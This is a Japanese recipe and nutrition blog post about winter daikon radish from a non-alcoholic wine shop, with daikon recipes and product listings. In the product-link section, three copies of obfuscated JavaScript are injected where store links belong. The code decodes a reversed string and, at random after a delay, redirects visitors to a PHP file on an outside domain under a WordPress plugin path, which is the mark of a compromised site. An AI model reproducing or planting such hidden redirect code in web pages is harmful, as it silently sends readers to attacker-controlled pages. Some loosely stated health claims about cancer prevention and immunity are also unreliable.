ノンアルコールワインを楽しむ皆様に。

   
2022/1/15 posted

今が旬!美味しく食べよう、ダイコン

   

  オリジナルレシピ 食材

 

冬に旬を迎える代表的な野菜といえば、大根があります。
おでんの具として外せないのはもちろん、ふろふき大根やぶり大根などの煮物、豚汁などの汁物などアツアツのお料理から、サラダや漬物まで、さまざまなメニューで楽しめる大根はとても便利な野菜です。
野菜は旬の時期に食べるのが最も栄養価が高くて、価格も安く、また、味わいも良いもの。今回は、大根の基礎知識と栄養価、美味しい食べ方を学んで、今旬真っ盛りの大根を味わいつくしましょう。
ノンアルコールビールやノンアルコールワインともピッタリの、あっと驚く洋風レシピもご紹介いたします!

◇冬の大根の特徴は?

一般的には冬が旬とされている大根ですが、最近では品種改良によりさまざまな品種が登場し、一年中私たちの食卓に上るようになりました。
しかし、実は大根は収穫される季節によって、食感や味わいが異なり、美味しく食べられる料理が変わってきます。

春大根 ・・・ 春大根は辛みが強く、みずみずしい口当たり。煮込み料理よりも、漬物やサラダ、大根おろしなど生食に適しています。

夏大根 ・・・ 春大根よりさらに辛みは増して、身が引き締まって硬いのが夏大根。サラダや大根おろしなど生食に適するほか、水分が少なくコリコリした食感は炒め物にもピッタリです。

冬大根 ・・・ 甘みがあってみずみずしく、柔らかいのが秋・冬の大根。繊維が柔らかいため味がしみこみやすいのに、煮崩れしにくいのが特徴。おでん、ふろふき大根、田楽など、煮込み料理にすると最高のおいしさです。

温かい煮込み料理が恋しくなるこの季節にピッタリの野菜が、まさに冬大根なのです。

◇1本の中でも味が変わる?部位に適した調理法を学ぼう

また、大根は縦に長い野菜ですが、実は、1本の中でも部分によって味が異なり、適した調理方法が異なります。
葉に近い上部、中間部、細くなっている末端部の3つに分割して考えてみましょう。

上部 ・・・ 葉に近い上部は、葉で作られたでんぷんを多く含むため甘く、肉質がしっかりしています。
この部分が適しているのは断然生食。ピリピリした辛みが少なく生で食べやすい部位なので、大根サラダや野菜スティックとして楽しんだり、大根おろしにするのもこの部位がベストです。

中間部 ・・・ 適度な水分を含んでおり、辛みは控えめで適度な甘みのある中間部。バランスの取れた味わいと食感のため、生食にも料理にもオールマイティーに使える部位です。
太さが均一なため、おでんや煮込み料理に使うと火の通りが均一で、見た目もきれいに仕上がります。

末端部 ・・・ 上部と反対に、辛みが強いのが末端部。実は、この辛味は大根の生存戦略なのです。
根の先端には、成長のための細胞分裂を行う成長点という部分があります。この部分が害虫に食べられてしまわないよう、末端部は辛みの元であるグルコシノレートという物質を多く含んでいます。
害虫に細胞がかじられて壊れると、グルコシノレートが酵素と反応し、強い辛みを持つアリルイソチオシアネートという物質に変化して害虫を遠ざけるのです。

下部は水分が少なく硬いですが、反面、調味料の染み込みが良いため、照り煮など濃いめの味でしっかり煮込む料理に適しています。加熱調理をすれば、辛みも気になりません。漬物にも良いでしょう。
また、薬味に辛い大根おろしが好みの方にもおすすめの部位です。

1本の大根を買ったときは、部位によって調理方法を変えてみると美味しく食べられます。
また、すでに切り分けられている大根を購入する場合は、作る料理によって購入部位を選ぶと良いですね。

◇焼き魚に大根おろしの訳は?豊富な消化酵素

では、次に大根に含まれる栄養素を見てみましょう。

光に当たらず地中で育つ真っ白な大根。
残念ながら、大根はビタミン類の含有量では緑黄色野菜には劣りますが、大根に特徴的な栄養素があります。それが、豊富な消化酵素類です。

大根には、炭水化物消化酵素のジアスターゼ(アミラーゼ)、たんぱく質分解酵素のプロテアーゼ、そして、脂質分解酵素のリパーゼなどの消化酵素を豊富に含むことで知られています。
焼き魚、ハンバーグや唐揚げなど脂っこい料理に大根おろしを添えることが多いのは、味のアクセントになるのはもちろん、酵素の力で食物の消化吸収を助け、胃もたれを防ぐためでもあるのです。
日頃から胃腸の弱い方はもちろん、年末年始の暴飲暴食で胃腸が弱っていると感じる方は、ぜひ積極的に大根おろしを摂取してみましょう。

注意したいのは、酵素は加熱すると効果がなくなってしまうため、酵素類の摂取が目的の場合は、生食する必要がある点です。
その点で大根おろしは、細かくすり下ろされているため、生でも消化に負担がかからずピッタリの食べ方です。
「寒いから、大根おろしはちょっと…」という方は、おろし蕎麦やみぞれ汁などの温かいメニューもありますよ。
なお、加熱する場合は、仕上がり際に投入するなど、加熱時間を短くする工夫をしてくださいね。

◇辛み物質・アリルイソチオシアネートで免疫力アップ

大根の辛み物質であるアリルイソチオシアネートは、ワサビやカラシに含まれる辛み成分でもあります。
さまざまな効果のある成分ですが、よく知られているのが強い抗菌作用。
お刺身などにツマ(大根の千切り)を添えたり、ワサビをつけて食べるのも、アリルイソチオシアネートの殺菌効果を利用した食中毒対策と考えると納得ですね。
それ以外にも、高い抗酸化作用があり、高血圧や血栓を予防したり、がんを抑制する効果もあるといわれています。

また、冬の時期に特に注目したいのが、アリルイソチオシアネートの白血球を活性化する働き。免疫機能をアップして風邪を予防したり、喉の炎症や痛みを緩和する効果があるので、寒い季節にはぜひ採りたい栄養素です。
なお、アリルイソチオシアネートは細胞が壊れることで作られる成分のため、豊富に摂取するには大根おろしにして食べるのがよいでしょう。揮発性が高いため、大根をおろしたらすぐに食べるのが良いでしょう。
辛みが苦手な方は、漬物にして食べるのをおすすめします。

また、大根にはちみつをかけて、浸透圧で大根のエキスを引き出した「大根アメ」もアリルイソチオシアネートの摂取にぴったりです。
大根(末端部を使用するのがベストです)を皮付きのまま1センチ程度の角切りにして、密閉容器に入れてハチミツをひたひたになるまで注ぎます。半日ほど放置して、大根がしわしわに小さくなったらできあがり。お好みで、スライスしたショウガを一緒に漬け込んでも良いでしょう。
のどの痛みや炎症に、液体をそのままスプーンなどでなめます。飲みにくい場合は、お湯で割ると良いでしょう。
長期保存ができないため、作る量は1日~2日程度で食べきれる量にしてください。

◇実は緑黄色野菜。大根の葉っぱは捨てないで!

有機野菜を取り扱うお店、八百屋さん、道の駅や野菜の直売所などでは、葉付きのままの大根が売られていることがあります。
大根葉は緑黄色野菜に分類され、実は、私たちが通常食べている大根の根の部分よりずっと栄養豊富。ベータカロチン、ビタミンC、ビタミンK、葉酸などのビタミン類や、カルシウム、カリウムなどのミネラルを豊富に含んでいます。
特に豊富なのはベータカロチン。100グラム当たり3900μg。なんとベータカロチンを多く含む野菜として知られるホウレンソウに匹敵する量です。
また、カルシウムも100グラム当たり260mgも含んでおり、カルシウムが豊富で知られる小松菜の170mgをはるかに超える量。青物野菜の中ではトップクラスのカルシウム含有量です。
本来ならば捨ててしまうのはもったいない部位である大根葉。次回、葉付き大根を見かけたら、ぜひ購入してお料理に活用してみましょう。

大根葉は、シャキシャキした歯ざわりと、独特のほろ苦くクセのある味わいが特徴ですが、油で炒めることで苦みが気にならなくなります。
一番のおすすめは、ふりかけ。細かく刻んでごま油で炒め、火が通ったら醤油、ちりめんじゃこ、白ごまを加えて水分がなくなるまで炒りつければできあがり。冷蔵庫で1週間程度、冷凍すれば1カ月は保存可能です。
ふりかけとしてご飯にかけるのはもちろん、混ぜ込んでおにぎりにしたり、ゆでたパスタと合えれば和風パスタにもなります。
洋風がお好みの方は、ガーリックオイルと唐辛子で炒めてペペロンチーノ風味のふりかけにしても美味しいですよ。

◇ビールやワインに合わせたい!あっと驚く洋風大根レシピ

おでん、ふろふき大根など、どちらかというと和風のイメージがある大根。
しかし、味わいが淡泊なため、味付けを工夫することで洋風おつまみに調理することもできるんです!
ここでは、ビールやワインにも良く合う、大根の洋風レシピ3種をご紹介します。

なお、大根は固いため、通常は調理に時間がかかります。
そこで今回は、まず電子レンジで下処理してから調理して、調理時間を短縮しましょう。水から生米を加えて加熱することで、水だけで煮るよりも大根が軟らかくなり、また、アクやえぐ味が吸収されて、より美味しく仕上がりますよ。

・大根の簡単レンジで下処理方法

(材料)
・大根 1/2本
・生米 大さじ1
・水
・レンジ可能の容器、ラップ

(手順)
1.大根は2センチの輪切りにして、厚めに皮をむきます。一方の面に1センチ幅の格子状に隠し包丁を入れます。
2.レンジ可能の容器に大根が重ならないように並べ、大根の高さの半分まで水を入れます。生のお米をふり入れ、容器にラップをかけて500Wで10分加熱。さらに10分置いたら下ゆで完了です。
3.煮汁から上げて、お米を取り除いて料理に使いましょう。余る場合は、フリーザーバッグに入れて冷凍も可能です。1カ月ほど保存できます。

【レシピ】大根のハーブソルト風味唐揚げ

レンジで柔らかく火を通した大根に、衣をつけてカリッと揚げました。外はサクサク、中はジューシー。予想外の味わいが楽しめるメニューです。

(材料)2人分
・下処理済み大根  2センチ輪切り×2~3個切れ
・顆粒コンソメ 小さじ1/2
・ハーブソルト 小さじ1/2
・片栗粉 大さじ2~3
・あらびき胡椒 少々
・揚げ油 適量
・耐熱ボウル、ラップ、キッチンペーパー、ビニール袋、フライパン

(作り方)
1.下処理した大根は一口大の角切りにして、耐熱ボウルに入れる。水大さじ1と顆粒コンソメを加えてよく混ぜて、ラップをして500W のレンジで2分さらに加熱する。竹串がすっと通るようになったらOK。固いようなら、様子をみながら柔らかくなるまでさらに加熱する。柔らかくなったら、ハーブソルトを加えてよく混ぜて、10分ほど冷まし粗熱を取る。
2.フライパンに揚げ油を熱し、180度に準備しておく。
3.1.の大根をざるに上げて水分を切る。さらにキッチンペーパーで余分な水分をふき取り、ビニール袋に入れる。ビニール袋に片栗粉とあらびき胡椒を振り入れて、袋を膨らませてよく振って粉類を大根にしっかりまぶす。
4.衣をつけた大根を熱した油にいれ、衣がカリッとするまで3,4分油で揚げたらできあがり。

(オススメの飲み物は?)
炭酸を含んだビールやスパークリングワインは、揚げ物類ととっても好相性。サクサクした大根の唐揚げの食感を引き立てること間違いなしの組み合わせです。

☆MELLOW storeのおすすめ
【ノンアルコール・ベルギービール】

ビア・デザミー0.0  → $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tore.com/view/item/000000000201″>クリックして商品を見る

デュク・ドゥ・モンターニュ・プレステージ
ブラン・ド・ブラン・ブリュット → toreのおすすめ
【ノンアルコール・ベルギービール】
ビア・デザミー0.0  → 
$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tore.com/view/item/000000000204″>クリックして商品を見る

ヴィンテンス・オリジン レ・ギャレ(赤) → toreのおすすめ
【ノンアルコール・白ワイン】
ヴィンテンス・シャルドネ(白) → 
$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tore.com/view/item/000000000222″>クリックして商品を見る

☆こちらもご覧ください MELLOW過去記事☆
・まもなく肉の日!美味しいすき焼きのコツ
・安いステーキ肉を高級肉並みに柔らかくする方法
・ビーフシチューが劇的に美味しくなる赤ワインの使い方

MELLOWは本格ワインのノンアルコールワインをオススメします!

デュク・ドゥ・モンターニュ ブリュット

デュク・ドゥ・モンターニュ ブリュット/750ml

メーカー / 
 NEOBULLES(ネオブュル)社 ベルギー
味わい / 
辛口でキレのある口あたり、まろやかな酸味。
アルコール度数 / 
0.0%

よりドライな口当たりのノンアルコール・スパークリングワインが欲しいという声に応える商品。青リンゴとレモンを思わせる爽やかな果実味に、まろやかな酸味。キリッとした口当たりに、爽やかなはじける炭酸。辛口タイプのノンアルコール・スパークリングワインです。

デュク・ドゥ・モンターニュ 製品

デュク・ドゥ・モンターニュ/750ml

カロリー / 
27kcal (100mlあたり)
メーカー / 
 NEOBULLES(ネオブュル)社 ベルギー
味わい / 
甘口
アルコール度数 / 
0.0%

ノンアルコールなのに、まるでシャンパンの味。本物のワインを醸造後、独自の脱アルコール製法で仕上げた本格的な味わいのノンアルコールスパークリングワイン。お酒が飲めない方や、妊娠・授乳中の方、ドライバーの方にも安心して楽しんでいただける商品です。

デュク・ドゥ・モンターニュ・ロゼ 製品

デュク・ドゥ・モンターニュ・ロゼ/750ml

カロリー / 
23kcal (100mlあたり)
メーカー / 
 NEOBULLES(ネオブュル)社 ベルギー
味わい / 
やや甘口
アルコール度数 / 
0.0%

本物のワインを醸造後、独自の脱アルコール製法で仕上げた本格的な味わいのノンアルコールスパークリングワイン。ロゼは、輝くようなサーモンピンクの愛らしい色合い。華やかなアロマの香りも豊かなエレガントな商品です。

ヴィンテンス・シャルドネ(白) 製品

ヴィンテンス・シャルドネ(白)/750ml

※ボトルデザインをリニューアルしました
カロリー / 
20kcal (100mlあたり)
メーカー / NEOBULLES(ネオブュル)社 ベルギー
味わい / 
やや辛口
アルコール度数 / 
0.0%

ブルゴーニュ地域を代表する品種のシャルドネを使用しています。ブドウの品種にこだわり醸造したワインからアルコール分だけを取り除いたノンアルコールスティルワイン。シトラスの香りと複雑味のある豊かな味わいをお楽しみいただけます。鶏肉などの白身肉や魚の料理と相性がよいタイプです。

ヴィンテンス・メルロー(赤) 製品

ヴィンテンス・メルロー(赤)/750ml

※ボトルデザインをリニューアルしました
カロリー / 
20kcal (100mlあたり)
メーカー / 
 NEOBULLES(ネオブュル)社 ベルギー
味わい / 
やや辛口
アルコール度数 / 
0.0%

ボルドー地域を代表する品種のメルローを使用しています。ブドウの品種にこだわり醸造したワインからアルコール分だけを取り除いたノンアルコールスティルワイン。フルーティーながらコクがあり、ブルーベリーの風味も感じられます。赤味の肉やチーズと好相性です。

Thanks for your reading!